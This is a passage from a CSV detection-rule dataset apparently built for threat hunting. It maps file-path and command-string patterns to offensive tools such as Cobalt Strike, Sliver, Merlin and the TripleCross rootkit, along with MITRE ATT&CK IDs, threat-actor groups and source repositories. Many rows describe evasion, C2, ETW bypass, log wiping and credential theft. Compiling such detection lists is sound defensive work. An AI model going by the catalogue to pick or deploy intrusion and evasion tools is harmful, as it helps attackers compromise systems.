LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://gist.github.com/G0ldenGunSec/8ca0e853dd5637af2881697f8de6aecc","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/enumerate.cna*",".{0,1000}\/enumerate\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host enumeration with Beacon built-in commands","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/red-team-scripts","1","1","N/A","10","10","1095","192","2019-11-18T05:30:18Z","2017-05-01T13:53:05Z" "*/enumerate/enumerate.py*",".{0,1000}\/enumerate\/enumerate\.py.{0,1000}","offensive_tool_keyword","gato","GitHub Self-Hosted Runner Enumeration and Attack Tool","T1083 - T1087 - T1081","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/praetorian-inc/gato","1","0","N/A","N/A","5","446","43","2024-04-26T17:00:08Z","2023-01-06T15:43:27Z" 
"*/enumeration/azureAd.py*",".{0,1000}\/enumeration\/azureAd\.py.{0,1000}","offensive_tool_keyword","Vajra","Vajra is a UI based tool with multiple techniques for attacking and enumerating in target's Azure environment","T1087 - T1098 - T1583 - T1078 - T1110 - T1566 - T1537 - T1020 - T1526 - T1482","TA0003 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/TROUBLE-1/Vajra","1","1","N/A","N/A","4","352","59","2024-03-21T06:25:58Z","2022-03-01T14:31:27Z" "*/enumeration/azureAzService.py*",".{0,1000}\/enumeration\/azureAzService\.py.{0,1000}","offensive_tool_keyword","Vajra","Vajra is a UI based tool with multiple techniques for attacking and enumerating in target's Azure environment","T1087 - T1098 - T1583 - T1078 - T1110 - T1566 - T1537 - T1020 - T1526 - T1482","TA0003 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/TROUBLE-1/Vajra","1","1","N/A","N/A","4","352","59","2024-03-21T06:25:58Z","2022-03-01T14:31:27Z" "*/enumeration/subdomain.py*",".{0,1000}\/enumeration\/subdomain\.py.{0,1000}","offensive_tool_keyword","Vajra","Vajra is a UI based tool with multiple techniques for attacking and enumerating in target's Azure environment","T1087 - T1098 - T1583 - T1078 - T1110 - T1566 - T1537 - T1020 - T1526 - T1482","TA0003 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/TROUBLE-1/Vajra","1","1","N/A","N/A","4","352","59","2024-03-21T06:25:58Z","2022-03-01T14:31:27Z" "*/enumeration/userenum.py*",".{0,1000}\/enumeration\/userenum\.py.{0,1000}","offensive_tool_keyword","Vajra","Vajra is a UI based tool with multiple techniques for attacking and enumerating in target's Azure environment","T1087 - T1098 - T1583 - T1078 - T1110 - T1566 - T1537 - T1020 - T1526 - T1482","TA0003 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation 
tools","https://github.com/TROUBLE-1/Vajra","1","1","N/A","N/A","4","352","59","2024-03-21T06:25:58Z","2022-03-01T14:31:27Z" "*/enumeration_process.exe*",".{0,1000}\/enumeration_process\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*/epmd-info.nse*",".{0,1000}\/epmd\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/eppc-enum-processes.nse*",".{0,1000}\/eppc\-enum\-processes\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Erebus/*.dll*",".{0,1000}\/Erebus\/.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1408","219","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z" "*/Erebus/*.exe*",".{0,1000}\/Erebus\/.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - 
T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1408","219","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z" "*/Erebus-email.*",".{0,1000}\/Erebus\-email\..{0,1000}","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1408","219","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z" "*/etc/cron.d/ebpfbackdoor*",".{0,1000}\/etc\/cron\.d\/ebpfbackdoor.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","N/A","10","10","1709","211","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z" "*/etc/cron.weekly/tor*",".{0,1000}\/etc\/cron\.weekly\/tor.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","CostaRicto - Operation Wocao","APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*/etc/default/tor",".{0,1000}\/etc\/default\/tor","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","CostaRicto - Operation Wocao","APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*/etc/init.d/tor*",".{0,1000}\/etc\/init\.d\/tor.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. 
Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","CostaRicto - Operation Wocao","APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*/etc/init.d/tor*",".{0,1000}\/etc\/init\.d\/tor.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*/etc/init.d/tor2web*",".{0,1000}\/etc\/init\.d\/tor2web.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*/etc/kidlogger*",".{0,1000}\/etc\/kidlogger.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*/etc/ld.so.preload && rm* process successfully hidden*",".{0,1000}\/etc\/ld\.so\.preload\s\&\&\srm.{0,1000}\sprocess\ssuccessfully\shidden.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" 
"*/etc/passwd*/.sudo_as_admin_successful*",".{0,1000}\/etc\/passwd.{0,1000}\/\.sudo_as_admin_successful.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","3198","550","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z" "*/etc/reverst/*",".{0,1000}\/etc\/reverst\/.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","0","N/A","10","10","611","22","2024-05-01T12:27:28Z","2024-04-03T13:32:11Z" "*/etc/sudoers.d/ebpfbackdoor*",".{0,1000}\/etc\/sudoers\.d\/ebpfbackdoor.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","N/A","10","10","1709","211","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z" "*/etc/sv/tor/log*",".{0,1000}\/etc\/sv\/tor\/log.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. 
Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","CostaRicto - Operation Wocao","APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*/etc/systemd/gsc*",".{0,1000}\/etc\/systemd\/gsc.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*/etc/systemd/system/IMDS.service*",".{0,1000}\/etc\/systemd\/system\/IMDS\.service.{0,1000}","offensive_tool_keyword","IMDSpoof","IMDSPOOF is a cyber deception tool that spoofs the AWS IMDS service to return HoneyTokens that can be alerted on.","T1584 - T1204 - T1078 - T1558","TA0007 - TA0001 - TA0002 - TA0004","N/A","N/A","Sniffing & Spoofing","https://github.com/grahamhelton/IMDSpoof","1","0","N/A","8","1","84","2","2023-11-24T23:42:48Z","2023-11-24T23:21:21Z" "*/etc/tor/*.conf*",".{0,1000}\/etc\/tor\/.{0,1000}\.conf.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","CostaRicto - Operation Wocao","APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*/EternalHushCore.dll*",".{0,1000}\/EternalHushCore\.dll.{0,1000}","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. 
Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","1","N/A","10","10","3","0","2023-10-28T13:08:06Z","2023-07-09T09:13:21Z" "*/EternalHushFramework.git*",".{0,1000}\/EternalHushFramework\.git.{0,1000}","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","1","N/A","10","10","3","0","2023-10-28T13:08:06Z","2023-07-09T09:13:21Z" "*/etumbot.profile*",".{0,1000}\/etumbot\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1427","420","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*/etw.cna",".{0,1000}\/etw\.cna","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","506","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "*/etw.x64.*",".{0,1000}\/etw\.x64\..{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","506","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "*/etw.x86.*",".{0,1000}\/etw\.x86\..{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - 
T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","506","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "*/etw-fuck.cpp*",".{0,1000}\/etw\-fuck\.cpp.{0,1000}","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","1","N/A","10","1","81","12","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z" "*/etw-fuck.exe*",".{0,1000}\/etw\-fuck\.exe.{0,1000}","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","1","N/A","10","1","81","12","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z" "*/ETWHash/*",".{0,1000}\/ETWHash\/.{0,1000}","offensive_tool_keyword","ETWHash","C# POC to extract NetNTLMv1/v2 hashes from ETW provider","T1556.001","TA0009 ","N/A","N/A","Credential Access","https://github.com/nettitude/ETWHash","1","1","N/A","N/A","3","244","29","2023-05-10T06:45:06Z","2023-04-26T15:53:01Z" "*/etwunhook.cpp*",".{0,1000}\/etwunhook\.cpp.{0,1000}","offensive_tool_keyword","etwunhook","Simple ETW unhook PoC. 
Overwrites NtTraceEvent opcode to disable ETW at Nt-function level.","T1055 - T1562.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Meowmycks/etwunhook","1","1","N/A","9","1","39","8","2024-02-29T10:07:52Z","2024-01-22T22:21:09Z" "*/etwunhook.exe*",".{0,1000}\/etwunhook\.exe.{0,1000}","offensive_tool_keyword","etwunhook","Simple ETW unhook PoC. Overwrites NtTraceEvent opcode to disable ETW at Nt-function level.","T1055 - T1562.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Meowmycks/etwunhook","1","1","N/A","9","1","39","8","2024-02-29T10:07:52Z","2024-01-22T22:21:09Z" "*/etwunhook.git*",".{0,1000}\/etwunhook\.git.{0,1000}","offensive_tool_keyword","etwunhook","Simple ETW unhook PoC. Overwrites NtTraceEvent opcode to disable ETW at Nt-function level.","T1055 - T1562.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Meowmycks/etwunhook","1","1","N/A","9","1","39","8","2024-02-29T10:07:52Z","2024-01-22T22:21:09Z" "*/evasion/evasion.go",".{0,1000}\/evasion\/evasion\.go","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*/evasion/windows/*",".{0,1000}\/evasion\/windows\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/evasion_linux.go*",".{0,1000}\/evasion_linux\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*/evasion_windows.go*",".{0,1000}\/evasion_windows\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*/EventCleaner.cpp*",".{0,1000}\/EventCleaner\.cpp.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense 
